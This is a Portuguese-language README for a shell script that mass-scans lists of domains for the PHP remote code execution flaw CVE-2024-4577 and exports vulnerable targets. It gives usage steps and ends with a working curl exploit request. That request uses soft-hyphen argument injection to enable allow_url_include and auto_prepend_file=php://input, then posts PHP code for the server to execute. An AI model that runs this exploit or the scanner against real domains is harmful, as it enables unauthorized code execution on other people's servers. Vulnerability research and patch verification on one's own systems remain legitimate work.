
Script shell para escanear domínios pela vulnerabilidade de execução remota de código CVE-2024-4577 no PHP através de requisições POST manipuladas, exportando alvos vulneráveis para verificação manual.
Este script foi projetado para verificar a vulnerabilidade descrita pelo CVE-2024-4577, que envolve a exploração de certas configurações PHP para executar código arbitrário remotamente. Ele envia uma requisição POST para endpoints especificados em uma lista de domínios e verifica se a resposta indica vulnerabilidade.
Instalar o GNU Parallel:
sudo apt-get install parallel
Clonar o Repositório: Clone este repositório para sua máquina local usando Git:
git clone https://github.com/Yukiioz/CVE-2024-4577.git
Navegar até o Repositório: Entre no diretório clonado:
cd CVE-2024-4577
Preparar a Lista de Domínios: Crie um arquivo de texto contendo uma lista de domínios a serem verificados. Cada domínio deve estar em uma nova linha. Por exemplo:
https://example1.com
https://example2.com
https://example3.com
Executar o Script:
Execute o script CVE-2024-4577.sh, passando o caminho para o arquivo de lista de domínios como argumento:
./CVE-2024-4577.sh live-subdomains.txt | tee script.log
Revisar a Saída:
O script exibirá informações de progresso enquanto verifica cada domínio. Se um domínio for considerado vulnerável, ele será destacado em vermelho. O script também exportará uma lista de domínios vulneráveis para um arquivo chamado vulnerable_domains.txt.
vulnerable_domains.txtO script exporta uma lista de domínios vulneráveis para um arquivo chamado vulnerable_domains.txt. Este arquivo contém uma lista simples de domínios vulneráveis, com cada domínio em uma nova linha. Para confirmar manualmente, use o comando curl para enviar uma requisição POST ao endpoint alvo no domínio. Substitua https://dev.example.com/test.php pelo endpoint real no domínio alvo.
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
-H "User-Agent: curl/8.3.0" \
--data "<?php phpinfo(); ?>"